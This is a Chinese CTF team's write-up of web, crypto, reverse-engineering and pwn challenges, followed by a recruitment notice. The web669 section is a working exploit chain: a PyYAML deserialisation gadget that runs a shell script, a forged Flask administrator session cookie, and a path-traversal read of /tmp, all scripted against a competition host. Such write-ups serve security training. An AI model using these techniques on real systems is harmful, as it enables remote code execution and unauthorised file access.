Web
签到
鼠标回退不刷新
web669
思路：先用目录穿越读取 hostname（推测它就是签名 session 用的 secret key，对应下面脚本里的 `-s "engine1"`），据此伪造 Administrator 身份的 session；绕过上传限制后利用 yaml 反序列化拿到 RCE；机器上存在带 SUID 的 dd，用它把 flag 读到 /tmp 目录下，再用目录穿越读出来。注意每触发一次 RCE 都要重新开一次容器。最终获取到 flag 和 suid。
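# PyYAML gadget for an unsafe yaml.load(): the frozenset constructor iterates
# the map object, and the map applies os.popen to each element, so the
# command runs at load time. The nesting matters -- the map (with its two
# arguments) must be the single argument of frozenset, which the flattened
# copy above had lost. It runs the `suanve` script unpacked under /tmp/1.
!!python/object/new:frozenset
- !!python/object/new:map
  - !!python/name:os.popen
  - ["bash /tmp/1/suanve"]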
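import os
import subprocess
import requests

# The exploit is run twice. Per the original notes, use these values:
#   run 1: rarname = "1"         with a session cookie whose updir is "/tmp/"
#   run 2: rarname = "fileinfo"  with a session cookie whose updir is "./"
# rarname = "1"
rarname = "fileinfo"

HOST = "http://eci2ze31f5e4ml2o80d0k06.cloudeci1.ichunqiu.com:8888"
# YAML document carrying the os.popen deserialisation gadget.
YAML_DOC = "f28f1f003578cfa35c012249c819edfa.yaml"

print(rarname)

# Archive the YAML gadget together with the `suanve` shell script it runs.
# The command is passed as an argument list, so no shell is involved and
# rarname is never interpolated into a command line.
rar_cmd = ["/Users/suan/Downloads/rar/rar", "a", rarname, YAML_DOC, "suanve"]
print(" ".join(rar_cmd))
subprocess.run(rar_cmd, check=True)

burp0_url = HOST + "/upload"
# Forged Flask session cookie. Its payload segment base64-decodes to
# {"updir":"./","user":"Administrator"}; the signature verifies because it
# was produced with the app's real secret key ("engine1" in the
# flask_session_cookie_manager command kept below), which the writeup says
# was recovered through directory traversal. For run 1, re-sign the same
# dict with "updir": "/tmp/".
burp0_cookies = {
    "session": (
        "eyJ1cGRpciI6Ii4vIiwidXNlciI6IkFkbWluaXN0cmF0b3IifQ"
        ".YwhAgQ.zcTOfpH44hAr6LcRs778nqfYi2Q"
    ),
}

# A plain GET on / creates the upload directory (per the original note).
requests.get(HOST + "/")

# Upload the archive; the file handle is closed as soon as the request ends.
with open(rarname + ".rar", "rb") as archive:
    s = requests.post(burp0_url, cookies=burp0_cookies, files={"file": archive})
print(s.text)
print("[!] path: static/uploads/f528764d624db129b32c21fbca0cb8d6/" + rarname + "/")

# Cookie re-signing helper used for run 1 (kept for reference):
# /Users/suan/tools/flask-session-cookiemanager/flask_session_cookie_manager3.py \
#     encode -t '{"updir":"./","user":"Administrator"}' -s "engine1"

# Requesting the uploaded document through /display makes the server parse
# it, which presumably is what fires the YAML gadget.
s = requests.get(HOST + "/display?file=1.yaml")
print(s.text)

# Read /tmp/1 (where the writeup says the SUID dd copied the flag) through
# path traversal. The path is 24 repetitions of "..././": if the server
# strips "../" in a single pass, each segment collapses back to "../",
# which is presumably why the plain "../" form did not work.
burp0_url = HOST + "/" + "..././" * 24 + "tmp/1"
s = requests.get(burp0_url)
print(s.text)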
Crypto
crypto091
爆破 hash（sha256 的原像）。开多线程很快；记得号码前面要加上 86，即从 8617090000000 开始枚举。注意原脚本里三个线程跑的是同一段区间，并没有分工。
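import hashlib
import threading

# Search window start: the hint says the number is prefixed with "86", and
# the writeup's answer 8617091733716 lies inside start+1 .. start+9999999.
num = 8617090000000
data = "c22a563acc2a587afbfaaaa6d67bc6e628872b00bd7e998873881f7c6fdc62fc"


def getnum(start=num, count=9999999, target=data, stop=None):
    """Brute-force the decimal preimage of a SHA-256 hex digest.

    Tests ``start + 1 .. start + count`` (the original loop incremented
    before hashing, so ``start`` itself is never tried) and returns the first
    integer whose SHA-256 hex digest equals ``target``, or ``None``.

    ``stop`` is an optional ``threading.Event``: the search aborts as soon
    as it is set, and a successful search sets it, so sibling workers exit
    once one of them has found the answer.
    """
    for candidate in range(start + 1, start + count + 1):
        if stop is not None and stop.is_set():
            return None
        digest = hashlib.sha256(str(candidate).encode()).hexdigest()
        if digest == target:
            print('flag:{0}'.format(candidate))
            if stop is not None:
                stop.set()
            return candidate
    return None


if __name__ == "__main__":
    # The original started three threads over the *same* range, which just
    # repeated the work three times; give each thread a disjoint slice.
    # Note that CPython keeps the GIL while hashing such short buffers, so
    # threads add no real parallelism here -- processes would -- but the
    # full window still finishes quickly once the per-candidate print is gone.
    workers = 3
    chunk = 9999999 // workers + 1
    done = threading.Event()
    threads = [
        threading.Thread(
            name=f"t{i + 1}",
            target=getnum,
            args=(num + i * chunk, chunk, data, done),
        )
        for i in range(workers)
    ]
    for t in threads:
        t.start()
    for t in threads:
        t.join()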
flag8617091733716
Re
re694
打开re.exe发现是个输入,丢exeinfope查一下壳,发现有个upx壳
用 010 Editor 查看发现文件里的 UPX 标识被改成了 FUK，改回 UPX 后即可用 upx 正常脱壳。
直接使用upx.exe -d 进行脱壳
然后使用ida打开,找到start
然后shift+f12查看输入
找到这两个函数,里面有个计算公式
数组数据最后写脚本
# Cipher bytes dumped from the binary's array (20 entries).
data = [0x4B, 0x48, 0x79, 0x13, 0x45, 0x30, 0x5C, 0x49, 0x5A,
        0x79, 0x13, 0x70, 0x6D, 0x78, 0x13, 0x6F, 0x48, 0x5D, 0x64, 0x64]


def _decode_byte(value):
    """Invert the binary's per-byte transform: XOR 0x50, subtract 10, XOR 0x66."""
    # Python evaluates the original expression as ((b ^ 0x50) - 10) ^ 0x66,
    # since `-` binds tighter than `^`; the parentheses make that explicit.
    return chr(((value ^ 0x50) - 10) ^ 0x66)


flag = "".join(_decode_byte(byte) for byte in data)
print(flag)
flag{why_m0dify_pUx_SheLL}
re693
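import re

# Sink function whose callers we want; every identifier in challenge.go is an
# obfuscated 16-character name, hence the \w{16} pattern below.
TARGET = "cHZv5op8rOmlAkb6"
_IDENT_RE = re.compile(r"\w{16}")


def read_stripped(path):
    """Return the lines of *path* with leading/trailing whitespace removed."""
    with open(path) as fh:
        return [line.strip() for line in fh]


def count_callers(lines, target=TARGET):
    """Find the functions that return ``target(...)`` and count their own callers.

    Reproduces the original heuristic: for each line containing
    ``return <target>(``, the enclosing function's name is taken as the first
    16-character identifier on the line four lines earlier (assumed to be the
    ``func`` line), and its call count is the number of lines containing
    ``return <name>()``. Returns ``[(name, count), ...]`` in file order.
    Matches fewer than four lines from the top, or whose ``func`` line holds
    no 16-character identifier, are skipped (the original would have wrapped
    to the end of the file or raised IndexError there).
    """
    needle = f"return {target}("
    found = []
    for index, line in enumerate(lines):
        if needle not in line or index < 4:
            continue
        match = _IDENT_RE.search(lines[index - 4])
        if match is None:
            continue
        name = match.group(0)
        call_pattern = f"return {name}()"
        found.append((name, sum(call_pattern in other for other in lines)))
    return found


def has_n_commas(line, n=5):
    """True when *line* contains exactly *n* commas (a six-argument call for n=5)."""
    return line.count(",") == n


if __name__ == "__main__":
    for name, n_calls in count_callers(read_stripped("challenge.go")):
        print(name, n_calls)

    # Second pass over the output of
    #   cat challenge.go | grep -E "\(.*\, gLIhR,.*\)"
    # saved as ``t1``: keep only the calls that take exactly six arguments.
    with open("t1") as fh:
        for line in fh:
            if has_n_commas(line):
                print(line)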
最后试了n个函数得到flag
Pwn
pwn135
nc 连上后尝试一波，发现没有 ban 掉 read。
print(read('flag'))
<EOF>
Not we wil run your *.js with d8
flag{92394598-5bbf-4fd7-866a-da319bce9809}
done!
招新
EDI安全的CTF战队经常参与各大CTF比赛,了解CTF赛事。
欢迎各位师傅加入EDI,大家一起打CTF,一起进步。(诚招re crypto pwn misc方向的师傅)
有意向的师傅请联系邮箱root@edisec.net、shiyi@edisec.net(带上自己的简历,简历内容包括但不限于就读学校、个人ID、擅长技术方向、历史参与比赛成绩等等)